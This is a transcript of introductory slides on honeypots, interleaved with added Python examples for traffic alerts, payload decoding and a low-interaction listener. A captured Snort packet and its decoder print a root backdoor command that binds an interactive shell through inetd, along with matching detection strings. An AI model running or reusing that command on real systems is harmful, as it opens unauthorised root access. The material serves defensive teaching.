To Introduce You to Honeypots, What They

Upload: kaladgi

Post on 30-May-2018


TRANSCRIPT

  • 8/14/2019 To Introduce You to Honeypots, What They

    1/33

    Honeypots

    2/33

    Purpose

    To introduce you to honeypots, what they

    are, how they work, their value.

    3/33

    Definition

    Any security resource whose value lies in being probed, attacked, or compromised.

    4/33

    How honeypots work

    Simple concept

    A resource that expects no data, so any

    traffic to or from it is most likely

    unauthorized activity
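The "simple concept" above translates directly into a detection rule: because a honeypot expects no legitimate traffic, any flow with a honeypot on either end is an alert. The script below is an added example, not part of the original slides; the honeypot addresses, the flow-log lines and the log layout (timestamp, src:port -> dst:port, protocol) are all constructed for illustration, and the function and field names are this example's own.

```python
"""Turn the honeypot principle into a detection rule.

Added example, not part of the original slides.  Because a honeypot
expects no legitimate traffic, any flow that touches it is an alert.
The honeypot addresses and the flow-log lines are constructed for this
example, and the log layout (ts src:port -> dst:port proto) is assumed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List

# Constructed: addresses deployed as honeypots on the monitored network.
HONEYPOTS = frozenset({
    ipaddress.ip_address("10.10.10.2"),
    ipaddress.ip_address("10.10.10.3"),
})

# Constructed flow records in the assumed layout.
SAMPLE_LOG = """\
01/08-08:45:10 10.10.10.1:3591 -> 10.10.10.5:80 TCP
01/08-08:46:04 10.10.10.1:3592 -> 10.10.10.2:6112 TCP
01/08-08:46:09 10.10.10.2:1025 -> 192.0.2.7:53 UDP
01/08-08:47:00 10.10.10.9:51000 -> 10.10.10.5:443 TCP
"""


@dataclass
class Alert:
    ts: str
    src: str
    dst: str
    proto: str
    severity: str
    reason: str


def parse_flow(line: str):
    """Split one flow record into (ts, src_ip, src_port, dst_ip, dst_port, proto)."""
    ts, src, arrow, dst, proto = line.split()
    if arrow != "->":
        raise ValueError(f"unexpected flow record: {line!r}")
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return (ts, ipaddress.ip_address(src_ip), int(src_port),
            ipaddress.ip_address(dst_ip), int(dst_port), proto)


def find_honeypot_activity(lines: Iterable[str],
                           honeypots=HONEYPOTS) -> List[Alert]:
    """Return an Alert for every flow with a honeypot on either end."""
    alerts: List[Alert] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        ts, sip, sport, dip, dport, proto = parse_flow(line)
        src, dst = f"{sip}:{sport}", f"{dip}:{dport}"
        if dip in honeypots:
            # Inbound: somebody is probing or attacking the decoy.
            alerts.append(Alert(ts, src, dst, proto, "medium",
                                "inbound connection to honeypot"))
        elif sip in honeypots:
            # Outbound is worse: the decoy itself may now be compromised
            # and used against others (the "Risk" the slides warn about).
            alerts.append(Alert(ts, src, dst, proto, "high",
                                "outbound connection from honeypot"))
    return alerts


if __name__ == "__main__":
    for a in find_honeypot_activity(SAMPLE_LOG.splitlines()):
        print(f"{a.ts} [{a.severity}] {a.src} -> {a.dst} {a.proto}: {a.reason}")
```

Run against the constructed log, the rule raises two alerts out of four flows and rates the outbound one higher: traffic leaving a honeypot is the case the "Risk" slide describes, a decoy being used to reach other systems, and it deserves immediate response rather than analysis at leisure.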

    5/33

    Not limited to specific purpose

    Honeypots do not solve a specific problem,

    instead they are a tool that contribute to your

    overall security architecture.

    Their value, and the problems they help solve,

    depend on how you build, deploy, and use them.

    6/33

    Types

    Production (Law Enforcement)

    Research (Counter-Intelligence)

    Marty's idea

    7/33

    Value

    What is the value of honeypots?

    One of the greatest areas of confusion

    concerning honeypot technologies.

    8/33

    Advantages

    Based on how honeypots conceptually

    work, they have several advantages.

    Reduce False Positives and False Negatives

    Data Value

    Resources

    Simplicity

    9/33

    Disadvantages

    Based on the concept of honeypots, they

    also have disadvantages:

    Narrow Field of View

    Fingerprinting

    Risk

    10/33

    Production

    Prevention

    Detection

    Response

    11/33

    Prevention

    Keeping the burglar out of your house.

    Honeypots, in general are not effective prevention

    mechanisms.

    Deception, Deterrence, and Decoys are psychological

    weapons. They do NOT work against automated

    attacks:

    worms

    auto-rooters

    mass-rooters

    12/33

    Detection

    Detecting the burglar when he breaks in.

    Honeypots excel at this capability, due to

    their advantages.

    13/33

    Response

    Honeypots can be used to help respond to

    an incident.

    Can easily be pulled offline (unlike production

    systems).

    Little to no data pollution.

    14/33

    Research Honeypots

    Early Warning and Prediction

    Discover new Tools and Tactics

    Understand Motives, Behavior, and

    Organization

    Develop Analysis and Forensic Skills

    15/33

    Early Warning and Prediction

    16/33

    Tools

    01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112

    TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF

    ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32

    TCP Options (3) => NOP NOP TS: 463986683 4158792

    30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
    30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
    80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
    80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
    D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
    82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
    20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
    67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
    74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
    2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
    74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
    69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
    73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
    20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
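The dump above is Snort's standard hex/ASCII payload view, and the analyst's first job is to recover the bytes and read what the payload is trying to do. The decoder below is an added example, not code from the slides or from Snort: it re-reads the dump shown on this slide, pulls out printable strings the way strings(1) does, and flags the tell-tale signs of a service-spawning backdoor (an inetd configuration written to a temporary file and started from it). The indicator list and the function names are this example's own choices; the one layout assumption is Snort's default of up to 16 bytes per line before the ASCII column.

```python
"""Decode a Snort-style payload hex dump and flag backdoor indicators.

Added example, not from the original slides or from Snort.  SNORT_DUMP is
the payload reproduced on the "Tools" slide (10.10.10.1 -> 10.10.10.2:6112);
the indicator table and helper names are this example's own choices.
"""
import re
from typing import Dict, List, Tuple

SNORT_DUMP = """\
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
"""

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")

# What an analyst looks for in a payload like this: a service definition
# handed to inetd from a scratch file so that a shell listens on a port.
INDICATORS: List[Tuple[str, str]] = [
    ("nowait root", "inetd service definition running as root"),
    ("/usr/sbin/inetd -s", "inetd started from an attacker-supplied config"),
    ("sh -i", "interactive shell bound to a network service"),
]


def decode_dump(text: str, width: int = 16) -> bytes:
    """Recover raw bytes from 'XX XX ... XX  <ascii>' lines.

    Assumes Snort's layout: up to `width` hex pairs, then the ASCII column.
    On a short final line the first non-hex token ends the hex region."""
    out = bytearray()
    for line in text.splitlines():
        for tok in line.split()[:width]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """strings(1)-style extraction of runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def analyse(text: str) -> Dict[str, object]:
    """Decode the dump and report size, strings and matched indicators."""
    data = decode_dump(text)
    strings = printable_strings(data)
    hits = [(pat, why) for pat, why in INDICATORS
            if any(pat in s for s in strings)]
    return {"size": len(data), "strings": strings, "hits": hits}


if __name__ == "__main__":
    report = analyse(SNORT_DUMP)
    print(f"{report['size']} payload bytes")
    for s in report["strings"]:
        print("string:", s)
    for pat, why in report["hits"]:
        print(f"indicator {pat!r}: {why}")
```

Decoded, the 240 payload bytes split into a short header, a run of non-printable addresses and instructions (the part the ASCII column shows as dots), and one long command string; all three indicators match on that string. The non-printable run is the part that is specific to the targeted service, while the indicators are the part worth turning into a generic signature, because the same "write a config, start inetd from it, clean up" pattern recurs across unrelated exploits.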

    17/33

    Tactics

    18/33

    Motives and Behavior

    J4ck: why don't you start charging for packet

    attacks?

    J4ck: "give me x amount and I'll take bla bla offline

    for this amount of time"

    J1LL: it was illegal last I checked.

    J4ck: heh, then everything you do is illegal. Why not

    make money off of it?

    J4ck: I know plenty of people that'd pay exorbitant

    amounts for packeting.

    19/33

    Level of Interaction

    Level of Interaction determines amount of

    functionality a honeypot provides.

    The greater the interaction, the more you

    can learn.

    The greater the interaction, the more

    complexity and risk.

    20/33

    Risk

    Chance that an attacker can use your

    honeypot to harm, attack, or infiltrate other

    systems or organizations.

    21/33

    Low Interaction

    Provide Emulated Services

    No operating system for attacker to access.

    Information limited to transactional

    information and attackers' activities with

    emulated services.
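What "emulated service, no operating system to access" means in practice is shown by the listener below. It is an added example, not code from the slides or from any of the products they list: it answers a connection with a fake banner, records what the peer sends, and closes, so all it ever yields is the transactional record the slide describes, and all an attacker ever gets is a socket that stores bytes. The banner text, the port, the byte cap and the record fields are this example's own choices.

```python
"""A minimal low-interaction honeypot service.

Added example, not from the slides or the products they list.  It
emulates one service with a fake banner, records the transaction, and
never hands the peer a real shell or operating system, which is what
bounds the risk of a low-interaction honeypot.  Banner, port and field
names are this example's own choices.
"""
import json
import socket
from datetime import datetime, timezone
from typing import Dict

BANNER = b"220 mail.example.internal ESMTP ready\r\n"  # constructed fake banner
MAX_BYTES = 4096      # cap on what is kept from one session
READ_TIMEOUT = 5.0    # seconds of silence before the session is closed


def handle_session(conn: socket.socket, peer: str, banner: bytes = BANNER,
                   max_bytes: int = MAX_BYTES,
                   timeout: float = READ_TIMEOUT) -> Dict[str, object]:
    """Send the banner, capture what the peer sends, close, return a record.

    Input is only stored, never interpreted.  That is the low-interaction
    trade-off: little to learn beyond the transaction, but nothing for
    the attacker to actually use."""
    started = datetime.now(timezone.utc).isoformat()
    conn.settimeout(timeout)
    received = bytearray()
    try:
        conn.sendall(banner)
        while len(received) < max_bytes:
            chunk = conn.recv(min(1024, max_bytes - len(received)))
            if not chunk:          # peer closed its side
                break
            received.extend(chunk)
    except OSError:
        pass                       # timeout or reset: still worth logging
    finally:
        conn.close()
    return {
        "ts": started,
        "peer": peer,
        "bytes": len(received),
        "data_hex": received.hex(),
        "preview": received.decode("ascii", errors="replace")[:80],
    }


def serve(host: str = "0.0.0.0", port: int = 2525) -> None:
    """Accept connections forever and print one JSON record per session."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(16)
        while True:
            conn, addr = srv.accept()
            print(json.dumps(handle_session(conn, f"{addr[0]}:{addr[1]}")))


if __name__ == "__main__":
    serve()
```

The byte cap and timeout are what keep the listener from becoming a resource-exhaustion target itself; the hex copy of the input preserves binary probes exactly, while the short preview is for a human skimming the log. Because the peer's data is never executed, parsed as commands or written anywhere but the log, this sits at the low-risk end of the interaction scale the preceding slides lay out.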

    22/33

    High Interaction

    Provide Actual Operating Systems

    Learn extensive amounts of information.

    Extensive risk.

    23/33

    Honeypots

    BackOfficer Friendly

    http://www.nfr.com/products/bof/

    SPECTER http://www.specter.com

    Honeyd http://www.citi.umich.edu/u/provos/honeyd/

    ManTrap

    http://www.recourse.com

    Honeynets http://project.honeynet.org/papers/honeynet/

    (Diagram: the products above are arranged on a scale from low interaction to high interaction.)

    24/33

    BackOfficer Friendly

    25/33

    Specter

    26/33

    Honeyd

    create default

    set default personality "FreeBSD 2.2.1-STABLE"

    set default default action open

    add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"

    add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"

    add default tcp port 113 reset

    add default tcp port 1 reset

    create windows

    set windows personality "Windows NT 4.0 Server SP5-SP6"

    27/33

    ManTrap

    28/33

    Honeynets

    29/33

    Which is best?

    None. They all have their advantages and disadvantages; it depends on what you are

    attempting to achieve.

    30/33

    31/33

    Legal Contact for

    .mil / .gov

    Department of Justice, Computer Crime and

    Intellectual Property Section

    General Number: (202) 514-1026

    Specific Contact: Richard Salgado

    Direct Telephone (202) 353-7848

    E-Mail: [email protected]

    32/33

    Summary

    Honeypots are a highly flexible security tool

    that can be used in a variety of different

    deployments.

    33/33

    Resources

    Honeypots: Tracking Hackers

    http://www.tracking-hackers.com